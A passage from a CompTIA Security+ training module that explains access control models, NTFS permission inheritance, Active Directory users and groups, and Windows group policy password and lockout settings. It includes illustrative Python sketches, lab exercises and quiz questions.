Authenticated Users serve much the same purpose. The important difference is that while every object only has one
owner, it can have a separate set of permissions for any number of different users or groups. The terminology
is also somewhat different, reflecting the differences in the models and in the underlying operating systems.

SID A security identifier identifies a particular principal, such as a user or group. In general, you'll see
it as a user-readable name, but the underlying SID (which you might encounter occasionally) is a
long numerical string. A typical SID looks something like S-1-5-21-2848498414-1294978650-2608437243-500.
ACE An access control entry is a piece of metadata attached to an object, containing a SID and the
permissions it has. An ACE can have positive (allow) or negative (deny) rules. There are more
possible permissions than in Unix: you can separately set read, write, modify, execute, list folder
contents, or more. You can even set full permissions with a single flag.
DACL A discretionary access control list is the whole list of ACEs that apply to an object. It doesn't only include
the explicit ACEs set on that precise object, but also the inherited ACEs it receives from its parent
object, and the generic ACEs set to give default behavior for entire object classes.

It's also a little less intuitive just what permissions apply to a given user that wants to access a particular
resource. When you try to access an NTFS file, Windows examines the SIDs for your user name and all of the
groups you belong to, then goes through the object's DACL to see what ACEs apply to you. If none do, you're
implicitly denied access. If some do, Windows then applies those ACEs in the following priority.


1. Explicit deny
2. Explicit allow
3. Inherited deny
4. Inherited allow
Multiple ACEs for different groups are cumulative: if one ACE gives you read access and another ACE gives
you write access, you'll have both. But due to priority, if one ACE explicitly denies you read access and
another explicitly allows it, you'll be denied access. This is a sort of fail safe mechanism, making it harder to
leave a loophole when blocking access to resources.
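The priority order can be sketched as a simple evaluation function. This is an illustration of the documented logic only, not how Windows actually implements DACL processing, and the ACE structure here is invented for the example.

from typing import NamedTuple

class Ace(NamedTuple):
    sid: str          # user or group the entry applies to
    allow: bool       # True = allow, False = deny
    inherited: bool   # True if inherited from a parent object
    right: str        # e.g. "read", "write"

def has_access(user_sids, dacl, right):
    """Apply the documented priority: explicit deny, explicit allow,
    inherited deny, inherited allow. No matching ACE means implicit deny."""
    matches = [a for a in dacl if a.sid in user_sids and a.right == right]
    priority = [(False, False), (False, True), (True, False), (True, True)]
    for inherited, allow in priority:   # (inherited?, allow?) checked in order
        if any(a.inherited == inherited and a.allow == allow for a in matches):
            return allow
    return False                        # implicit deny

dacl = [
    Ace("Sales users", allow=True, inherited=False, right="read"),
    Ace("Interns", allow=False, inherited=False, right="read"),
]
print(has_access({"alice", "Sales users"}, dacl, "read"))             # True
print(has_access({"bob", "Sales users", "Interns"}, dacl, "read"))    # False: explicit deny wins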

Note: When you share NTFS files or folders on the network, and the sharing permissions are different
than the NTFS permissions, the more restrictive permission takes effect. For example, if the NTFS ACE
gives read/write permissions, and the share is read-only, the remote user won't be able to write to the
folder. The same would be true if the share was read/write, but the NTFS folder was read-only.

Mandatory access control


Mandatory access control is centrally managed by administrators. Even with files they've created, users aren't
inherently able to unilaterally change permissions to give someone else access, or otherwise override security
policies set by administrators. This allows for much stronger security, and protects against the damage done
by trojan horses. The main disadvantage of MAC is that it's much less flexible, and needs much more hands-
on setup and management by administrators to remain usable. MAC is supported by a wide variety of
operating systems, though by default it may not be installed or apply throughout the operating system. For
example, Security Enhanced Linux (SELinux) adds MAC to Linux operating systems, while Windows Vista
and newer use Mandatory Integrity Control to apply security to running processes.
Instead of ACLs, MAC systems typically apply security labels both to users and to resources, and the rules for
access depend on how the labels match up. A simple MAC system might simply use levels of sensitivity. For
example, if it's using simple government-style classifications, all information would be marked as
Unclassified, Confidential, Secret, or Top Secret. Each user would likewise have a clearance label of one of
the same values.

This particular model is called the Bell-LaPadula model. It's also classified as a type of lattice-based access
control (LBAC), because you can construct a mathematical lattice that compares the user's clearance level to
the resource's sensitivity level, and enforces a set of rules called information flow.
 Users have read/write access to resources of their own level. A user with Secret clearance can read and
write Secret documents.
 Users cannot read resources of a higher sensitivity level, but may be able to write to them. This is
called a "no read up" policy. That same Secret user can't read documents in the Top Secret folder, but
can save new ones there (presumably for people of higher clearance to read).
 Users can read resources of a lower sensitivity level, but cannot write to them. This is called a "no write
down" policy. A Secret user can read Classified documents, but not create or modify them.


The last one might sound a little counter-intuitive, but it's very important for maintaining security. It's what
prevents a trojan horse or other trick from making a user with a high clearance move or copy highly sensitive
data to a low sensitivity location.
MAC systems can add other features, like compartmentalization to enforce need to know restrictions. A Top
Secret document might be further labeled with a specific department or project, and to access it a user not
only needs to have Top Secret clearance, but the project security label as well.
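Here's a minimal Python sketch of these information flow rules, using the clearance levels named above. It's illustrative only, not code from any real MAC implementation.

LEVELS = ["Unclassified", "Confidential", "Secret", "Top Secret"]

def can_read(user_clearance, resource_label):
    # "No read up": a subject may read only at or below its own level.
    return LEVELS.index(user_clearance) >= LEVELS.index(resource_label)

def can_write(user_clearance, resource_label):
    # "No write down": a subject may write only at or above its own level.
    return LEVELS.index(user_clearance) <= LEVELS.index(resource_label)

print(can_read("Secret", "Confidential"))   # True: reading down is allowed
print(can_read("Secret", "Top Secret"))     # False: no read up
print(can_write("Secret", "Top Secret"))    # True: writing up is allowed
print(can_write("Secret", "Confidential"))  # False: no write down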

Role-based access control


Role-based access control can be classified as a form of MAC, since access is centrally controlled by
administrators, but like DAC it allows access to be permitted for individual resources on a more flexible level.
Unlike DAC, RBAC generally has no strict concept of ownership, and it doesn't store permissions on each
object. Instead, it defines roles, each with a set of access rights defining how it can access each type of object.
Roles are very similar to DAC groups, in that a user can belong to one or more roles, and gets the cumulative
permissions of all of them; however, in many role-based systems it's recommended users belong only to one
role at a time.

QuickBooks is a popular application which uses roles to secure access.

Much like in NTFS, when a user wants to access a resource in an RBAC system, the system examines the
permissions of all the user's roles and sees if any apply. Unlike NTFS there are typically only positive, not
negative, permissions—as long as the user has at least one role authorized to take the requested action, the
action is allowed. Otherwise, implicit deny takes over and access is denied.
RBAC is rather flexible, and able to perform most of the functions of either DAC or traditional MAC systems
when properly implemented. Since it's centrally administered it can be changed easily by administrators either
by editing roles or by changing the roles assigned to particular users, and at the same time it can't be easily
bypassed by users like a DAC system. It's also well-designed for enforcing separation of duties: you can
easily assign different parts of multi-step processes to different roles, and then not assign those roles all to one
person.


Rule-based access control


Rule-based access control shares a common acronym with role-based access control, but they're otherwise
quite different. Like DAC, it uses a list of rules configured in an ACL, but unlike DAC the ACL is stored on a
system or device and controlled by an administrator. Rule-based access control is pretty simple to implement
and is widely used. Common examples include the ACLs used by routers and firewalls, as well as software
whitelists or blacklists.

Exam Objective: CompTIA SY0-501 4.4.2.5


Rules themselves can be static, or they can be dynamic and change with events. For example, an IPS could
add new restrictions to stop an attack it recognizes, and either remove them after a set period or when given
administrator approval. A retail system might be configured to give the assistant manager some additional
permissions when the manager is out: the system detects whether the manager is logged in, and assigns the
assistant's rules accordingly.
Another popular application for rule-based access control is time of day restrictions which allow access to
resources only at certain times. You most commonly see these in parental restrictions on home computers,
where they're used to make sure a child can't stay up playing on the computer after bedtime. Time of day
restrictions can also be useful in the workplace: for instance, you might restrict access to a sensitive resource
after business hours, so that a malicious employee can't "work late" to misuse it when no one is looking.
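As a simple illustration of a dynamic, time-based rule (the share name and business hours are made up for the example), such a check might look like this:

from datetime import datetime, time

BUSINESS_HOURS = (time(8, 0), time(18, 0))     # hypothetical policy window

def access_permitted(resource, now=None):
    """Allow the sensitive share only during business hours; anything not
    covered by a rule falls through to an allow in this simple example."""
    now = now or datetime.now()
    if resource == r"\\fileserver\payroll":    # hypothetical sensitive share
        start, end = BUSINESS_HOURS
        return start <= now.time() <= end
    return True

print(access_permitted(r"\\fileserver\payroll", datetime(2017, 6, 1, 23, 30)))  # False: after hours
print(access_permitted(r"\\fileserver\payroll", datetime(2017, 6, 1, 10, 0)))   # True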

Attribute-based access control


ABAC is sometimes called a "next generation" access control because of its flexibility. Every time access is
requested, the system evaluates it according to a set of policies defined by an administrator. The policies
themselves are Boolean evaluations against attributes relating to users, resources, action types, or the
environmental details (or context) of the request.

Exam Objective: CompTIA SY0-501 4.4.2.10


For a simple example, imagine someone wants to access highly sensitive product development reports. The
relevant policy might, in common language, be phrased like this:
“Development reports can be read only by managers from the R&D department who are connected on the
trusted local network or over a secure VPN.”
In this case "development" is a resource attribute on the data. "Read" is an action attribute. "Manager" and
"R&D department" are user attributes. The user's current connection type is a contextual attribute.
In practice, ABAC can be as complex and fine-grained as you need it to be. One reason is that you can apply
attributes to almost anything. Contextual attributes are particularly flexible: they can represent time of day,
frequency of transactions, the client used to connect, physical location, or any other way the circumstances of
the request might affect its risk level.
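That sample policy can be expressed as a Boolean check over attribute sets. The sketch below is purely illustrative; real XACML policies are written in XML, and the attribute names here are invented.

def development_report_policy(user, resource, action, context):
    """'Development reports can be read only by managers from the R&D
    department who are connected on the trusted local network or over
    a secure VPN.'"""
    return (
        resource.get("category") == "development-report"
        and action == "read"
        and user.get("role") == "manager"
        and user.get("department") == "R&D"
        and context.get("connection") in ("trusted-lan", "vpn")
    )

user = {"role": "manager", "department": "R&D"}
resource = {"category": "development-report"}
print(development_report_policy(user, resource, "read", {"connection": "vpn"}))     # True
print(development_report_policy(user, resource, "read", {"connection": "public"}))  # False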
You can also define policies to be as elaborate as you like, limited only by your imagination and the
capabilities of the language used to create them. A single action might be governed by one or several policies,
and policies can be given priorities so that one can override another. This combination of open-ended
attributes and policies allows you to create an ABAC scheme that enforces any of the other policy models, or
that provides complex functionality that other models can't easily match.
One popular ABAC implementation is eXtensible Access Control Markup Language (XACML), an XML-
based standard which defines a policy language, attribute elements, and an overall system architecture to
evaluate and enforce policies.


Discussion: Access control models


1. What access control models have you worked with in the past?
Answers may vary, but in general operating systems use DAC and network equipment uses rule-based.
2. Why is it important in MAC that a high security user can't simply save data to a low-security location?
A careless user or trojan horse could place high sensitivity data where anyone can access it.
3. What is the difference between groups on Linux volumes and NTFS volumes?
In Linux a file can belong to only one group. In NTFS it can have separate permissions set for any
number of groups.
4. Why is it so easy to use ABAC to implement other access control models?
Attributes are a flexible enough concept that it's easy to make them correspond to roles, rules, or labels.

Inherited permissions
Setting up any access control system securely requires some work: depending on the model you're using and
how you're approaching configuration, it's easy to leave people unable to do their work or expose sensitive
data to theft. The latter is far worse: if you make permissions too tight you're sure to hear the complaints
sooner or later, but if they're too loose you might not know until after the data breach happens.
Exactly what access controls you'll have to configure and what problems they might have depends on the
software your organization uses, but one place it's easy to screw up is with the DAC used by Windows NTFS
volumes. Even if you configure the file system securely at first, inherited permissions can cause security
problems, especially when objects are moved around.
Inherited permissions are permissions assigned to a parent object that flow down and apply to a child object.
A file or folder inherits permissions from its parent folder when you create it. If you copy or move the
object, what happens to its permissions depends on its destination and on whether you're copying or moving it (summarized in a short sketch below).

1. If the destination is within the same volume, it's important whether you're copying or moving the object.

• Objects moved elsewhere within the same volume keep their original permissions.
• Objects copied elsewhere within the same volume inherit the permissions of the destination folder.

2. If the destination is in a different NTFS volume, the object inherits the permissions of the destination
folder whether you're copying or moving it.
3. If the destination is FAT or another non-NTFS file system, the object loses all NTFS permissions whether
you're copying or moving it.


Inherited permissions during a move operation

Inherited permissions can be NTFS permissions or Share permissions.
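The rules above can be condensed into a small decision function. This is just a memory aid for the behavior described, not how Windows implements it.

def resulting_permissions(operation, same_volume, dest_is_ntfs):
    """Return what happens to an object's NTFS permissions after a copy or move."""
    if not dest_is_ntfs:
        return "all NTFS permissions are lost"
    if operation == "move" and same_volume:
        return "original permissions are kept"
    return "permissions are inherited from the destination folder"

print(resulting_permissions("move", same_volume=True, dest_is_ntfs=True))
print(resulting_permissions("copy", same_volume=True, dest_is_ntfs=True))
print(resulting_permissions("move", same_volume=False, dest_is_ntfs=True))
print(resulting_permissions("copy", same_volume=False, dest_is_ntfs=False))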

Stopping permissions inheritance


In Windows, if you want to assign different permissions to child objects, you must stop permissions
inheritance. In most Windows versions, you break this link by clearing the Include inheritable
permissions from this object's parent check box in Advanced Security Settings. If you
attempt to make a change to a child object's permissions and the boxes are grayed out as shown in the
following figures, this is your clue to stop permission inheritance.


1. Right-click the parent folder and choose Properties.


2. On the Permissions tab, click Change Permissions.
3. In the Advanced Security Settings dialog box, clear the Include inheritable permissions
from this object's parent check box.
4. If you want to copy the parent permissions as a starting point to customize the child objects' permissions,
check Replace all child object permissions with inheritable permissions
from this object.
This gives you an editable set of the parent permissions on child objects.
5. Click OK.
6. Click OK again.
Be aware that once you break the link, the child object won't inherit any permission settings from the parent
object unless you specifically force inheritance again by rechecking the Include inheritable
permissions from this object's parent checkbox or propagating permissions.

Propagating permissions
When you change the permissions of a parent folder, you
have the option of applying that change to all sub-folders.
This is referred to as permission propagation. To
propagate folder permissions down a structure where
permissions inheritance has been broken, you use
Advanced Security Settings.

1. Right-click the parent folder and choose


Properties.
2. On the Permissions tab, click Change
Permissions.
3. Select the desired Access Control Entry, and click
Edit.
4. Set the desired permissions and check Apply
these permissions to objects and/or
containers within this container
only.
5. Click OK.
6. Click OK again.
Never assume a permissions change will be inherited or
propagated; always check the child's permissions to verify.


Exercise: Managing NTFS permissions


In this exercise, you'll explore how to view and assign permissions for an NTFS folder.
Do This How & Why

1. On the Windows Server 2012 VM, create folders and files to secure. You'll be their owner, but you can give access permissions to whoever you like.

a) In Windows Explorer, create a folder named C:\NTFS lab

b) In NTFS lab, create a Sales data folder

c) In Sales data, create a text document named Customer list.

d) Type anything you want into the text document, then save and close it.

2. Give a new group permissions to the Sales data folder.

a) From the NTFS lab folder, right-click Sales data and click Properties. The Properties window opens.

b) On the Security tab, click Edit. Clicking Edit is the easiest way to add permissions. Clicking
Advanced gives you more flexibility.

The Permissions window opens.

c) Click Add. The Select window appears.


d) Type Sales users and click Check Names. It should be underlined to show that it's valid.

e) Click OK. "Sales users" now appears in the group and user list in the
Permissions window.

f) With Sales users selected, check the Allow column next to Full control. Checking Full control automatically checks all of the others.

g) Click OK. To close the Permissions window. Now, any member of the
Sales users group will have full access to the folder.

3. Add advanced permissions for the folder. You want members of the Marketing user group to be able to save files to the folder, even though they shouldn't have full control.

a) On the Security tab, click Advanced. The Advanced Security Settings window opens.


b) Examine the window. It shows detailed permissions for each permission entry:
whether it's an allow or deny permission, the principal it
affects, the access type it gives, where it's inherited from, and
what it applies to. There are also two other tabs: one to view
auditing information, and one to view the effective access for a
given principal or device.

c) Click Add. The Permission Entry window opens. It only shows inherited
permissions from the C:\ drive for now, and you can't edit
anything directly.

d) Click Select a principal.

A Select window appears.

e) Type Marketing users and click OK. To add them to the Permission Entry window. You can now edit the rest of the window.

f) In the middle section, click Show advanced permissions. A larger selection of permissions appears.

g) Check Create files/write data. To allow Marketing users to write files to the folder.

h) Examine the top section. This permission entry sets an Allow permission and includes
all subfolders and files. You could change either of these.

i) Click OK. There's now a Special permission type set for Marketing users.

j) Click OK twice. To close the other windows.

The Permission Entry window after setting special permissions


Assessment: Access control principles


1. Secure access control models are based on which assumption? Choose the best response.
 Explicit Allow
 Explicit Deny
 Implicit Allow
 Implicit Deny

2. What access control model was popularized by military usage? Choose the best response.
 Discretionary
 Mandatory
 Role-based
 Rule-based

3. What access control model is used by network hardware such as routers?


 Discretionary
 Mandatory
 Role-based
 Rule-based

4. What identifies a security principal in an NTFS file system?


 ACE
 DACL
 LBAC
 SID

5. What group permissions would a Linux file have if its permissions displayed as -rwxrw-r--?

 Read and write


 Read only
 Read, write, and execute
 Write only

6. You want to implement an access control model that lets you easily assign users to a combination of
multiple roles, and also restrict access to some actions based on the time of day and physical location of
the user. Which model is the best fit? Choose the best response.
 ABAC
 DAC
 MAC
 Role-based access control


Module B: Account management


Even if you're using strong AAA technologies and policies, you still have to configure and enforce them to
keep data secure. The details depend on the software your organization uses, but it's likely going to include
workstation accounts, probably in the Windows environment. Knowing how to manage user privileges and
enforce account policies, especially on multi-user systems and domain-based networks, will go a long way to
securing your overall organization.
You will learn:
 About Active Directory user management
 How to create groups and other objects
 About group policy objects
 How to enforce account policies in Windows

Account types
Any given access control system will have a variety of user accounts, each with its own permissions. While
some access control models allow you to totally customize the permissions of a given account, most have an
assortment of account types that can serve as a starting point.

Exam Objective: CompTIA SY0-501 4.4.1

User Ordinary accounts for authenticated users. These usually have permissions to perform
everyday tasks and access information suitable to the user's job role, but they don't have
access to administrative functions or sensitive data outside the user's specific job role.
Privileged Accounts with access to resources that ordinary users don't have. Administrator accounts with full
access to a system are the clearest example of a privileged account, but there are others as well.
For example, a help desk worker might be able to reset passwords for user accounts, but
not to change more important security settings.
Shared/Generic Accounts not assigned to a specific user, but instead used by multiple people. This is
typically poor security practice since it makes accountability difficult or impossible, but
sometimes it's valuable. A reception desk with frequent staff changes might benefit from a
shared account, or a public kiosk that has limited permissions anyway. Even if it isn't used
by a single person, the account should still be assigned to a person responsible for
maintaining it.
Guest Accounts for guests or visitors who need some limited access to the system. Guest
accounts are much like user accounts but are even more restricted. For example, a guest
account on a network might be able to access the internet but no shared local resources.
Guest accounts may be shared or individual. Temporary employees who need the same
access as permanent ones might be assigned temporary user accounts instead of guest
accounts.
Service An account that is associated with an application or service that needs to interact with the
system. For example, a web server or database management system will have a service
account which can own and access resources just as if it were a user, but independent of
whatever user installed or ran the service.


Active Directory user management


On a Windows domain, account management is centralized. You can create or manage user accounts in the
Active Directory Users and Computers window on an Active Directory domain server.

Active Directory Users and Computers in Windows Server 2012

Active Directory defines several types of objects. Some are security principals, meaning that they can be
authenticated, while some are not. A security principal always has its own SID, so it can be assigned
permissions through ACEs. Objects can also be separated into container objects which can hold other objects,
and leaf objects which cannot.

User A user account that can log onto the domain, along with its associated information. Every
domain has at least an Administrator account and a Guest account. Users are principals
and leaf objects.
Contact Information about a person who is not a domain user, such as name, telephone number,
email, and address. Contacts are leaf objects, but not principals.
Computer A computer that is joined to the domain. Computers are principals and leaf objects.
Printer A pointer to a shared printer. Printers are leaf objects.
Shared folder A pointer to a shared folder on a volume in the domain. The data itself is stored in the
shared folder itself. Shared folders are leaf objects.
Group A container object that can contain user accounts, computers, and other groups. There are
two types of group:
 Security groups are principals that are used to centrally manage rights and
permissions for multiple users, computers, and subgroups.
 Distribution groups are not principals. They are used by email applications such as
Exchange to send email to users in the group.

Organizational A container object that can contain most other objects. They're used to create a logical
Unit (OU) hierarchy to mirror your organization's structure. Unlike security groups, OUs aren't
principals you can assign permissions to. Instead, you can use them to assign group
policies, security policies for OU members that override those of the domain itself.


Creating Active Directory objects


You can create and manage Active Directory objects in the Active Directory Users and Computers window.
In Windows Server 2012, open Server Manager and click Tools > Active Directory Users and Computers.

Creating new users or groups

 Use the left pane to select existing containers and list their contents.
 To create a new user, click a container in a domain, then click Action > New > User.
• Typically you'll create users in the Users container or an OU you've already created.
• The New Object - User has two screens. The first lets you set user name information, and the second
lets you set a password and password-related options.
• You can also right-click instead of clicking Action.
 To create a new computer, click a container in a domain and click Action > New > Computer. Type the
computer name, then click OK.
 To create a new group, click a container in a domain and click Action > New > Group.
• From the Group type list, choose Security or Distribution.
• From the Group Scope list, choose Domain local, Global, or Universal.
• Only Security groups can be assigned resource permissions.
 To create a new OU, select a domain or existing OU, and click Action > New > Organizational unit.
You can't create OUs within existing containers like Users or Computers.
Note: Deleting Active Directory objects is easy. Restoring them after deleting by mistake can be a pain.
If you want to be able to easily recover objects such as deleted accounts in Windows Server 2008 R2 or
later, you can use the Active Directory Recycle Bin. To enable it, open Active Directory Administrative
Center, and click Enable Recycle Bin. Make sure to do it before you start deleting anything, or you'll
have to use a more complicated process.

Group scopes
One of the main reasons for groups is that it's easier to manage than assigning the same permissions to every
user. For example, if all salespeople need a whole list of resources, you can give all of those permissions to
the Sales group, and then add each new salesperson to the Sales group. It's also more secure: if you find out the
Sales group has access to a highly sensitive folder only managers should access, you can just revoke the
whole group's access to the folder without having to worry if you missed somebody.


Another value of groups is that you can put a group inside of a group. You could create a Sales Managers
group that has access to those management-level resources, and make it a member of the Sales group. That
way, if you just add a new manager to the Sales Manager group, they'll inherit the Sales group's permissions
by default.
The point is that groups have scopes, which determine how far they reach within a domain forest.
The scope affects both what kinds of objects can be a part of the group, and also what kinds of group the
group itself can be a member of. In a large network with a lot of domains, especially joined over a WAN,
scopes can be very important. In a smaller network, it's less likely to be critical. If you're going to spend much
time maintaining groups, you should become very familiar with what domain local, global, and universal
groups are and how they interact. Otherwise, you should just keep the following guidelines in mind.
 Use domain local groups when you assign permissions to resources on the local domain.
 Use global groups to organize users sharing similar permissions needs. Don't assign resources
permissions to the global group—add the global group to a domain local group that has permissions.
 Use universal groups to nest global groups from different domains. This way you can give a single user
or group permissions from multiple domains.

Managing objects
You can perform some actions by right-clicking an object to access the context menu. You can edit an object's
full properties by double-clicking it, or right-clicking it and clicking Properties. Some properties are unique
to a single object type, while others, such as group membership, can be found on multiple types.

User properties, and adding users to a group

 Most, but not all, user properties are available in the Properties window.
• Change user info on the General, Address, Telephones, and Organizations tabs.
• Use the Account tab to change logon and password information, lock or unlock accounts, set account
expiration dates, or set logon hours.
• Use the context menu to reset the user's password.
 To add members to a selected group, click Add on the Members tab.
You can add multiple users by separating them with semicolons.
 To add a selected object to a group, click Add to Group in the context menu, or click Add on the
Member Of tab.
Apart from the window title it's much like adding members to a group.


Assigning special permissions


If you want to let someone manage all your Active Directory tasks you can give them the full administrative
credentials to do it. Other times you might not want to do that: help desk admins need to be able to reset
forgotten passwords, but they don't need to rearrange your AD groups. In these cases, you can delegate certain
Active Directory permissions to users or groups within an OU.

Note: Removing permissions is a bit more complex than adding them, so you still shouldn't do it lightly.

1. Right-click any domain, OU, or folder and click Delegate Control.


2. Click Next, then click Add.
3. In the Select Users, Computers, or Groups window, enter users or groups, then click OK.
4. Click Next, then check all tasks you want to delegate.
5. Click Next, then Finish.

Exercise: Managing Active Directory objects


In this exercise you'll create and manage Active Directory users, groups, and OUs in the Windows Server
2012 VM.
Do This How & Why

1. In Server Manager, click Tools > Active Directory Users and Computers. The Active Directory Users and Computers console opens.

2. Create a new OU. Organizational units are convenient for organizing objects and
assigning group policies.

a) Expand the mwha.local domain, if necessary. It displays the containers, or folders, created when AD was installed.


b) Right-click mwha.local and click New > Organizational Unit. The New Object - Organizational Unit window opens.

c) In the Name field, type IT Department. Protect container from accidental deletion is checked by default. You'll keep that.

d) Click OK. The new OU appears at the end of the list.

3. Try to delete the IT Department OU. Press Delete with it selected and click Yes. Nothing happens,
since it's protected.

4. Create a new user in the IT department.

a) Select the IT Department OU. If necessary.

b) Right-click the empty right pane and click New > User. The New Object - User window opens.

c) Fill out the first screen of the wizard as follows, then click Next. Duane Johnson, logon name Duane.

d) In the next screen, type P@ssw0rd into both password boxes.

e) Clear User must change password at next login, and check Password never expires. Note: When you really create secure accounts you shouldn't disable password expiration.

f) Click Next, then Finish. Duane Johnson is now listed as a user in the right pane.


5. Create two more IT support users named Jeff Hall and John White. Use the same settings you did for Duane.

6. Create a new group in the IT Department OU. You can't assign permissions to an OU. For that, you use groups.

a) Right-click the right pane and click New > Group. The New Object - Group window opens. By default, it's a Security group with Global scope.

b) In the Group name field, type Technical Support.

c) Click OK. The new group is created in the OU.

7. Add Duane Johnson to the Technical Support group. By assigning users to the group, you can assign the privileges they need all at once.

a) Right-click Duane Johnson and click Add to a group. The Select Groups window appears.

b) In the Enter object names field, type Technical Support.

c) Click Check Names. The name is underlined, verifying that it is valid.

d) Click OK twice. To close the window and confirm the successful addition.

8. Repeat the previous step to add Jeff Hall and John White to the Technical Support group. You don't really need to click Check Names every time, but it helps to make sure you didn't make a mistake.

9. Add Duane Johnson to the Domain Admins group. Don't add the other two. You can add any user or group to any number of other groups.


10. Assign special permissions to the Technical Support group. All technical support personnel need to be able to perform a couple of administrative tasks in Active Directory, but they don't need full privileges.

a) Right-click mwha.local and click Delegate Control. The Delegation of Control Wizard window opens.

b) Click Next, then Add. The Select Users, Computers, or Groups window opens. It
looks just like the Select Groups window.

c) Add the Technical Support group. Type Technical Support and click OK. The group is now
listed in the wizard.

d) Click Next. A list of permissions is displayed.

e) Check Reset user passwords and force password change at next logon and Join a computer to the domain.

f) Click Next, then Finish.

11. If time allows, create OUs for the HR department and Accounting department, along with at least one group and user in each one.

12. Close Active Directory Users and Computers.

Group policies
One of the most valuable tools for establishing security baselines and enforcing user permissions in Windows
is the Group Policy feature. Group policies let you centrally control how users can access Windows features
and resources. For example, you can use Group Policies to enforce password policies, set firewall rules, block
access to folders or network shares, or restrict use of particular desktop features like Task Manager.

Exam Objective: CompTIA SY0-501 4.4.3.2


The Group Policy Management Editor in Windows Server 2012

In Active Directory, you can set separate group policy objects (GPOs) for sites, domains, or OUs using the
Group Policy Management Editor. Business/Professional versions of Windows also have a more basic Local
Group Policy editor which you can use to edit GPOs for workgroup-based networks or standalone machines.
Without Active Directory you can only configure GPOs for one computer at a time, but you can manually
export settings from one computer and import them on another.
GPOs allow you to change thousands of settings affecting all sorts of Windows functions. The settings in a
GPO are divided into two categories.
Computer Configuration settings apply to all computers affected by the GPO, regardless of who is logged in.
Commonly configured categories include:

Scripts (Startup/Shutdown) Scripts that run when the computer first starts or when it shuts down.
Software settings Settings to automatically deploy software to the computer.
Account policies Policies related to user passwords, account lockout, and Kerberos
security settings.
Local policies Policies related to operating system hardening. Includes system
logging, user rights management, and general system security options
such as access to removable media.
Restricted groups Policies allowing you to prevent modification of individual security
groups, for example to prevent users from being added to or removed
from administrator groups.
Windows Firewall and Advanced Windows Firewall rules.
Security
Software restriction policies Policies allowing you to configure what software can run on the
computer.


User Configuration settings apply to all users affected by the GPO, regardless of the computer they use.

Scripts (Logon/Logoff) Scripts that run when a user logs on or logs off.
Folder redirection Settings to redirect user folders to network locations.
Software settings Settings to automatically distribute software to client computers when an affected
user logs on.
Administrative Templates Settings to control what features appear in the Start menu, taskbar, Control Panel,
and desktop.

Managing group policies


To manage GPOs in Active Directory, click Tools > Group Policy Management in the Server Manager
window.

Group Policy Management doesn't just allow you to edit existing GPOs, but also to create new ones. This can
make security challenging, since multiple GPOs mean there's a chance for one with weak security settings to
override one with strong settings. When multiple GPOs apply, Windows processes them in the following
order, meaning that each subsequent GPO overrides the one before.

1. Local GPO (set on the current computer)


2. Site GPO
3. Domain GPO
4. Organizational unit GPO
5. Child OU GPO
If multiple GPOs apply on the same level, each has a different link order. Higher link orders process first, and
lower last.
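To illustrate the precedence, here's a short sketch in which the effective value of each setting is whatever the last applicable GPO in the processing order supplies. The GPO names and settings are made up, and real Group Policy processing is considerably more involved.

# GPOs listed in processing order: local first, then site, domain, OU, child OU.
# Later entries override earlier ones, so the most specific GPO wins.
gpo_chain = [
    ("Local GPO",    {"MinimumPasswordLength": 6}),
    ("Site GPO",     {}),
    ("Domain GPO",   {"MinimumPasswordLength": 8, "AccountLockoutThreshold": 5}),
    ("OU GPO",       {"MinimumPasswordLength": 12}),
    ("Child OU GPO", {}),
]

def effective_settings(chain):
    result = {}
    for _name, settings in chain:
        result.update(settings)   # each subsequent GPO overrides the one before
    return result

print(effective_settings(gpo_chain))
# {'MinimumPasswordLength': 12, 'AccountLockoutThreshold': 5}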

 Click an existing GPO to view its settings along with the scope where it applies, delegation permissions
assigned, and its current status.
 To edit a GPO, right-click it and select Edit.
 To create a new GPO, right-click any domain, site, or OU and click Create a GPO in this domain and
link it here.
 To link an existing GPO, right-click any domain, site, or OU and click Link an existing GPO.


 To change the link order of multiple GPOs, click any domain, site, or OU and click the Links tab.
 To back up a GPO, right-click it and select Back up.
 To import or export security policies within the Group Policy Editor console, right-click Computer
Configuration > Policies > Windows Settings > Security Settings, and click Import or Export.
On workgroup or standalone machines, only the local GPO exists. There's also no Group Policy
Management window. To directly edit the local GPO, type group policy in the Search box or screen,
then click Edit group policy.

Setting GPO options


To use the Group Policy Editor console, navigate to folders in the left pane, then double-click items in the
right pane to configure them. Some options can only be disabled or enabled, while others have numerical or
other values. The ones you're most likely to configure to enforce security policies are in Computer
Configuration > Policies > Windows Settings > Security Settings.

Exam Objective: CompTIA SY0-501 4.4.3.1, 4.4.3.3, 4.4.3.7, 4.4.3.8, 4.4.3.9, 4.4.3.10

 Navigate to Account Policies > Password Policy to change password requirements.


• Set Minimum password length to set the smallest number of characters a password can have. For
strong security, choose a value between 8 and 12.
• Enable Password must meet complexity requirements to enforce basic complexity rules. If it is
enabled, all passwords must be at least six characters long, must not contain the user's user name, and must contain
characters from at least three of these categories: uppercase letters, lowercase letters, numbers, and special characters (see the sketch after this list).
• Set Maximum password age to set a maximum length of time users can use a password without
changing it. Lower values are more secure, but can be irritating to users.
• Set Enforce password history to specify a number of previous passwords Windows remembers for
the user, in order to prevent users from reusing the same passwords. Higher numbers are more secure
since users can't just cycle through the same couple of passwords.
• Click Minimum password age to set a period users must wait between password changes. This
prevents users from changing passwords several times to cycle through the password history.
• Enable Store passwords using reversible encryption to change how Windows stores passwords. This
method is less secure, so you should only do it if a program requires it.


 Navigate to Account Policies > Account Lockout Policy to lock accounts after repeated failed logon
attempts.
• Set Account lockout threshold to set how many failed attempts are needed to lock the account. The
default of 0 disables lockout. Lower values are more secure, but also make it easier for user error to
cause lockouts.
• If a lockout threshold is set, click Account lockout duration to specify a time in minutes the account
will be locked out. If the value is 0, only an administrator can unlock the account.
• If a lockout threshold is set, click Reset account lockout counter after to specify a time in minutes
for the failed attempts counter to reset. If the lockout duration is non-zero, this value must be less than
or equal to the lockout duration.
 Navigate to Local Policies > Audit policy or Event Log to change security logging options. For
example, you can change how successful or failed logons or privilege escalations are logged, or restrict
access to security logs.
 Navigate to Local Policies > User Rights Assignment or Local Policies > Security Options to
configure more advanced security options. For example, you can restrict what users can log on remotely,
require smart cards for authentication, or specify advanced User Account Control settings.
Note: In general, make sure you know what a specific setting is and what it does before you
change it. Otherwise you might encounter problems.
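Here's a rough Python sketch of the complexity check described in the list above. It's an approximation for teaching purposes; Windows also checks against parts of the user's full name and applies the rule only when the policy is enabled.

import re

def meets_complexity(password, username):
    """Approximation of the complexity rule: at least six characters, doesn't
    contain the account name, and uses at least three of the four character
    categories. (Illustrative only, not the exact Windows implementation.)"""
    if len(password) < 6:
        return False
    if username and username.lower() in password.lower():
        return False
    categories = [
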